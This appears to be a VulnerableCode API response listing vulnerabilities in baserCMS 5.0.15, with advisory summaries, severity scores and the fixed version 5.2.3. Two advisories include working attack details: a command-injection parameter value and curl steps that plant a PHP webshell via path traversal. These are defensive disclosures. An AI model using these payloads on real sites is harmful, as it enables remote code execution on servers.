Look up vulnerable packages by Package URL.

GET /api/packages/775718?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/775718?format=api",
    "purl": "pkg:composer/baserproject/basercms@5.0.15",
    "type": "composer",
    "namespace": "baserproject",
    "name": "basercms",
    "version": "5.0.15",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": "5.2.3",
    "latest_non_vulnerable_version": "5.2.3",
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=api",
            "vulnerability_id": "VCID-3new-f12y-8bf9",
            "summary": "baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)\n1. Load file shell (insecure `require_once`)\n   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)\n   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)\n\n### Impact\nRemote Code Execution (RCE)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09459",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00031",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09479",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-32957"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32957"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r",
                    "reference_id": "GHSA-hv78-cwp4-8r7r",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-hv78-cwp4-8r7r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2025-32957",
                "GHSA-hv78-cwp4-8r7r"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=api",
            "vulnerability_id": "VCID-4zw8-truk-pugf",
            "summary": "baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n  - `PluginsController::get_core_update()`\n- **Service**\n  - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n  - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n  ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n  ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n    
$request->getData('targetVersion') ?? '',\n    $request->getData('php') ?? 'php',\n    $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough administrator privileges are required, **this is a design issue where the impact 
extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00131",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32198",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00131",
                            "scoring_system": "epss",
                            "scoring_elements": "0.32167",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21861"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21861"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g",
                    "reference_id": "GHSA-qxmc-6f24-g86g",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-qxmc-6f24-g86g"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-21861",
                "GHSA-qxmc-6f24-g86g"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91016?format=api",
            "vulnerability_id": "VCID-7x3n-4c2b-nfbx",
            "summary": "baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17526",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00055",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17521",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30880"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30880"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv",
                    "reference_id": "GHSA-6hpg-8rx3-cwgv",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-6hpg-8rx3-cwgv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30880",
                "GHSA-6hpg-8rx3-cwgv"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=api",
            "vulnerability_id": "VCID-8buz-nsr9-3yge",
            "summary": "baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n    // ...\n    return $viewPath . $type . DS . $path;  // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n  -H \"Authorization: Bearer <token>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"theme\": \"BcThemeSample\",\n    \"plugin\": \"\",\n    \"type\": \"layout\",\n    \"path\": \"../../../../webroot/\",\n    \"base_name\": \"shell\",\n    \"ext\": \"php\",\n    \"contents\": \"<?php system($_GET[\\\"cmd\\\"]); ?>\"\n  }'\n\n# 3. 
RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. 
[CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>\n- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>\n- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>\n\nThis advisory was translated from Japanese to English using GitHub Copilot.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00145",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34571",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00145",
                            "scoring_system": "epss",
                            "scoring_elements": "0.34588",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30940"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_20837860"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30940"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq",
                    "reference_id": "GHSA-c5c6-37vq-pjcq",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-c5c6-37vq-pjcq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.2.3",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"
                }
            ],
            "aliases": [
                "CVE-2026-30940",
                "GHSA-c5c6-37vq-pjcq"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=api",
            "vulnerability_id": "VCID-8ssu-umet-37bk",
            "summary": "baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\nMalicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to baserCMS 5.2.3 or later.\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01622",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01615",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32734"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_20837860",
